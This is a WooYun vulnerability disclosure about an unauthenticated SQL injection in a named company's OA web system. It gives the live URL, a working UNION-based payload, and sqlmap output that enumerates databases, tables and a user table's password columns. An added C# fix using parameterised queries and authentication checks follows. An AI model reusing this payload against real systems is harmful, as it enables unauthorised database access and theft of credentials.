WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-11-30: Details have been sent to the vendor and are awaiting vendor handling.
2015-12-05: The vendor has actively ignored the vulnerability; details are disclosed to the public.
SQL injection
OA system
http://ucoa.uc56.com:8088/Login.aspx
Injection point reachable without authentication
http://ucoa.uc56.com:8088/OaWeb/PresonnelMain.aspx?typeid=26
Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NULL
---
[15:37:56] [INFO] testing Microsoft SQL Server
[15:37:56] [INFO] confirming Microsoft SQL Server
[15:37:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:37:57] [INFO] fetching database names
[15:37:57] [INFO] the SQL query used returns 6 entries
[15:37:57] [INFO] retrieved: master
[15:37:57] [INFO] retrieved: model
[15:37:58] [INFO] retrieved: msdb
[15:37:58] [INFO] retrieved: tempdb
[15:37:59] [INFO] retrieved: ucoa
[15:37:59] [INFO] retrieved: ucweb
available databases [6]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ucoa
[*] ucweb
Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NULL
---
[15:39:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:39:14] [INFO] fetching tables for database: ucoa
[15:39:14] [INFO] the SQL query used returns 70 entries
[15:39:14] [INFO] retrieved: dbo.a_user
[15:39:15] [INFO] retrieved: dbo.Android_User
[15:39:15] [INFO] retrieved: dbo.android_Version
[15:39:15] [INFO] retrieved: dbo.androidArea
[15:39:15] [INFO] retrieved: dbo.AreaClassfiy
[15:39:16] [INFO] retrieved: dbo.AreaClassfiy
[15:39:16] [INFO] retrieved: dbo.BackupDatabase
[15:39:16] [INFO] retrieved: dbo.BaiDuYuan
[15:39:19] [INFO] retrieved: dbo.Client
[15:39:19] [INFO] retrieved: dbo.ClientRecord
[15:39:20] [INFO] retrieved: dbo.CompanyIMG
[15:39:20] [INFO] retrieved: dbo.ContactCenter
[15:39:21] [INFO] retrieved: dbo.ContactMessage
[15:39:21] [INFO] retrieved: dbo.DemandFeedback
[15:39:22] [INFO] retrieved: dbo.Error_User
[15:39:23] [INFO] retrieved: dbo.Fax
[15:39:23] [INFO] retrieved: dbo.GraphicInfo
[15:39:23] [INFO] retrieved: dbo.GraphicItmeInfo
[15:39:24] [INFO] retrieved: dbo.ImportantMessages
[15:39:24] [INFO] retrieved: dbo.M_DISTRICT
[15:39:24] [INFO] retrieved: dbo.Menus
[15:39:25] [INFO] retrieved: dbo.N_Collection
[15:39:25] [INFO] retrieved: dbo.News
[15:39:25] [INFO] retrieved: dbo.newWxProgram
[15:39:26] [INFO] retrieved: dbo.Notice_Collection
[15:39:26] [INFO] retrieved: dbo.Options
[15:39:26] [INFO] retrieved: dbo.Personnel
[15:39:26] [INFO] retrieved: dbo.Port_EmpDept
[15:39:26] [INFO] retrieved: dbo.Port_EmpStation
[15:39:26] [INFO] retrieved: dbo.Program_backup
[15:39:27] [INFO] retrieved: dbo.Program_backup
[15:39:27] [INFO] retrieved: dbo.Range
[15:39:28] [INFO] retrieved: dbo.ReadRecord
[15:39:28] [INFO] retrieved: dbo.S_SearchClassfiy
[15:39:28] [INFO] retrieved: dbo.ScoreUser_backup
[15:39:29] [INFO] retrieved: dbo.ScoreUser_backup
[15:39:29] [INFO] retrieved: dbo.SiteNocies
[15:39:29] [INFO] retrieved: dbo.SiteNocies
[15:39:29] [INFO] retrieved: dbo.sqlmapoutput
[15:39:30] [INFO] retrieved: dbo.Sys_Role
[15:39:30] [INFO] retrieved: dbo.test2
[15:39:30] [INFO] retrieved: dbo.test2
[15:39:30] [INFO] retrieved: dbo.TodyVisit
[15:39:31] [INFO] retrieved: dbo.Uc_Port_Dept
[15:39:31] [INFO] retrieved: dbo.Uc_Port_Emp
[15:39:31] [INFO] retrieved: dbo.Uc_Port_Station
[15:39:31] [INFO] retrieved: dbo.UC_Video
[15:39:31] [INFO] retrieved: dbo.UcAuthority
[15:39:32] [INFO] retrieved: dbo.UcClaim
[15:39:32] [INFO] retrieved: dbo.UcClassify
[15:39:33] [INFO] retrieved: dbo.UcDemand
[15:39:33] [INFO] retrieved: dbo.UcDownload
[15:39:33] [INFO] retrieved: dbo.UcMateriaClassify
[15:39:33] [INFO] retrieved: dbo.UcMaterial
[15:39:34] [INFO] retrieved: dbo.UcMCfy
[15:39:34] [INFO] retrieved: dbo.UcMessages
[15:39:34] [INFO] retrieved: dbo.UcNotice
[15:39:35] [INFO] retrieved: dbo.UcSofoMsg
[15:39:35] [INFO] retrieved: dbo.UcSofoMsg
[15:39:35] [INFO] retrieved: dbo.UcUnknowngoods
[15:39:36] [INFO] retrieved: dbo.UcUserInfo
[15:39:36] [INFO] retrieved: dbo.V_UnKnownGoods
[15:39:36] [INFO] retrieved: dbo.Votes
[15:39:37] [INFO] retrieved: dbo.VotesUsers
[15:39:37] [INFO] retrieved: dbo.WeiXin_User
[15:39:37] [INFO] retrieved: dbo.WeiXin2015
[15:39:38] [INFO] retrieved: dbo.weixinuser2015
[15:39:38] [INFO] retrieved: dbo.WxProgram
[15:39:38] [INFO] retrieved: dbo.WxUser_backup
[15:39:39] [INFO] retrieved: dbo.WxUser_backup
Database: ucoa
[70 tables]
+-------------------+
| Android_User      |
| AreaClassfiy      |
| AreaClassfiy      |
| BackupDatabase    |
| BaiDuYuan         |
| Client            |
| ClientRecord      |
| CompanyIMG        |
| ContactCenter     |
| ContactMessage    |
| DemandFeedback    |
| Error_User        |
| Fax               |
| GraphicInfo       |
| GraphicItmeInfo   |
| ImportantMessages |
| M_DISTRICT        |
| Menus             |
| N_Collection      |
| News              |
| Notice_Collection |
| Options           |
| Personnel         |
| Port_EmpDept      |
| Port_EmpStation   |
| Program_backup    |
| Program_backup    |
| Range             |
| ReadRecord        |
| S_SearchClassfiy  |
| ScoreUser_backup  |
| ScoreUser_backup  |
| SiteNocies        |
| SiteNocies        |
| Sys_Role          |
| TodyVisit         |
| UC_Video          |
| UcAuthority       |
| UcClaim           |
| UcClassify        |
| UcDemand          |
| UcDownload        |
| UcMCfy            |
| UcMateriaClassify |
| UcMaterial        |
| UcMessages        |
| UcNotice          |
| UcSofoMsg         |
| UcSofoMsg         |
| UcUnknowngoods    |
| UcUserInfo        |
| Uc_Port_Dept      |
| Uc_Port_Emp       |
| Uc_Port_Station   |
| V_UnKnownGoods    |
| Votes             |
| VotesUsers        |
| WeiXin2015        |
| WeiXin_User       |
| WxProgram         |
| WxUser_backup     |
| WxUser_backup     |
| a_user            |
| androidArea       |
| android_Version   |
| newWxProgram      |
| sqlmapoutput      |
| test2             |
| test2             |
| weixinuser2015    |
+-------------------+
Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NULL
---
[15:40:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:40:44] [INFO] fetching tables for database: ucweb
[15:40:44] [INFO] the SQL query used returns 26 entries
[15:40:44] [INFO] retrieved: dbo.AdImg
[15:40:45] [INFO] retrieved: dbo.Area_info
[15:40:46] [INFO] retrieved: dbo.Area_info
[15:40:46] [INFO] retrieved: dbo.Company
[15:40:46] [INFO] retrieved: dbo.Contact
[15:40:46] [INFO] retrieved: dbo.DataBase_Backup
[15:40:46] [INFO] retrieved: dbo.Guestbook
[15:40:47] [INFO] retrieved: dbo.JoinContact
[15:40:47] [INFO] retrieved: dbo.Links
[15:40:47] [INFO] retrieved: dbo.Menu
[15:40:48] [INFO] retrieved: dbo.News_Img
[15:40:48] [INFO] retrieved: dbo.News_Img
[15:40:49] [INFO] retrieved: dbo.NewsType
[15:40:49] [INFO] retrieved: dbo.Product
[15:40:49] [INFO] retrieved: dbo.Range
[15:40:49] [INFO] retrieved: dbo.Recruitment
[15:40:50] [INFO] retrieved: dbo.ReplyGuestBook
[15:40:50] [INFO] retrieved: dbo.RGuestbook
[15:40:50] [INFO] retrieved: dbo.ServiceHotline
[15:40:50] [INFO] retrieved: dbo.sqlmapoutput
[15:40:50] [INFO] retrieved: dbo.tNews
[15:40:50] [INFO] retrieved: dbo.UC_Activity
[15:40:51] [INFO] retrieved: dbo.UC_People
[15:40:51] [INFO] retrieved: dbo.UcHonor
[15:40:51] [INFO] retrieved: dbo.UserInfo
[15:40:51] [INFO] retrieved: dbo.WebSite
Database: ucweb
[26 tables]
+-----------------+
| AdImg           |
| Area_info       |
| Area_info       |
| Company         |
| Contact         |
| DataBase_Backup |
| Guestbook       |
| JoinContact     |
| Links           |
| Menu            |
| NewsType        |
| News_Img        |
| News_Img        |
| Product         |
| RGuestbook      |
| Range           |
| Recruitment     |
| ReplyGuestBook  |
| ServiceHotline  |
| UC_Activity     |
| UC_People       |
| UcHonor         |
| UserInfo        |
| WebSite         |
| sqlmapoutput    |
| tNews           |
+-----------------+
Payload: typeid=26 UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(84)+CHAR(65)+CHAR(104)+CHAR(80)+CHAR(99)+CHAR(107)+CHAR(103)+CHAR(98)+CHAR(75)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113),NULL,NULL
---
[16:09:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[16:09:42] [INFO] fetching columns for table 'UcUserInfo' in database 'ucoa'
[16:09:42] [INFO] the SQL query used returns 21 entries
[16:09:42] [INFO] retrieved: "filesize","nchar"
[16:09:42] [INFO] retrieved: "noticeClassify","varchar"
[16:09:43] [INFO] retrieved: "orgCode","varchar"
[16:09:44] [INFO] retrieved: "orgType","varchar"
[16:09:44] [INFO] retrieved: "UcArea","varchar"
[16:09:44] [INFO] retrieved: "UcAuthority","varchar"
[16:09:44] [INFO] retrieved: "UcAuthorityName","varchar"
[16:09:45] [INFO] retrieved: "UcCenter","varchar"
[16:09:45] [INFO] retrieved: "UcCretae","datetime"
[16:09:46] [INFO] retrieved: "UcEMP","varchar"
[16:09:46] [INFO] retrieved: "UcENABLED","char"
[16:09:47] [INFO] retrieved: "UcID","int"
[16:09:47] [INFO] retrieved: "UcIsimportant","int"
[16:09:47] [INFO] retrieved: "UcIsTop","int"
[16:09:48] [INFO] retrieved: "UCNociteAreaID","nchar"
[16:09:48] [INFO] retrieved: "UcOaAdminEnabled","int"
[16:09:48] [INFO] retrieved: "UcSITE","varchar"
[16:09:48] [INFO] retrieved: "UcUserId","varchar"
[16:09:49] [INFO] retrieved: "UcUserName","varchar"
[16:09:49] [INFO] retrieved: "UcUserPwdAdmin","varchar"
[16:09:49] [INFO] retrieved: "UcUserPwdOa","varchar"
[16:09:50] [INFO] fetching entries for table 'UcUserInfo' in database 'ucoa'
[16:09:50] [INFO] the SQL query used returns 19519 entries
I did not dump the actual contents of the user table.
Filter SQL special characters.
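The injected parameter, typeid, is numeric, and the payload sqlmap recorded above (`26 UNION ALL SELECT CHAR(113)+...`) contains no quote characters, so a filter that only strips quotes would not stop it. The following is an added example, not code from the affected OA system: it parses typeid as an integer, binds it as a typed SqlParameter so the statement text never changes, and refuses the request when the caller is not logged in. The table and column names (Personnel, TypeId, Name, Dept, Phone) and the connection string are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;

// Added example, not the affected OA system's code. The table and column names
// (Personnel, TypeId, ...) and the connection string are assumptions.
public static class PersonnelRepository
{
    // The vulnerable shape this report implies is string concatenation such as
    //   "SELECT ... FROM Personnel WHERE TypeId = " + Request.QueryString["typeid"]
    // where "26 UNION ALL SELECT CHAR(113)+..." needs no quote characters to
    // become part of the statement. The hardened version below rejects anything
    // that is not an integer and binds it as a typed parameter, so the SQL text
    // is fixed regardless of the input.
    public static DataTable GetByType(string connStr, string typeIdRaw)
    {
        int typeId;
        if (!int.TryParse(typeIdRaw, out typeId) || typeId < 0)
            throw new ArgumentException("typeid must be a non-negative integer");

        const string sql = "SELECT Name, Dept, Phone FROM Personnel WHERE TypeId = @typeId";
        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@typeId", SqlDbType.Int).Value = typeId;
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }
}

// The injection point was reachable without logging in, so the page must also
// refuse unauthenticated requests before it touches the database.
public partial class PresonnelMain : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!Request.IsAuthenticated)
        {
            Response.Redirect("~/Login.aspx");
            return;
        }
        string connStr = "<connection string from Web.config>"; // placeholder
        DataTable rows = PersonnelRepository.GetByType(connStr, Request.QueryString["typeid"]);
        // ... bind rows to the page's data control
    }
}
```

The database login the application uses should additionally be limited to the ucoa schema it needs; the session above enumerated master, msdb and the separate ucweb database through the same injection point, which a least-privilege account would not permit.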
Severity: No impact (vendor ignored)
Ignored at: 2015-12-05 17:58
Vulnerability Rank: 15 (WooYun rating)
None yet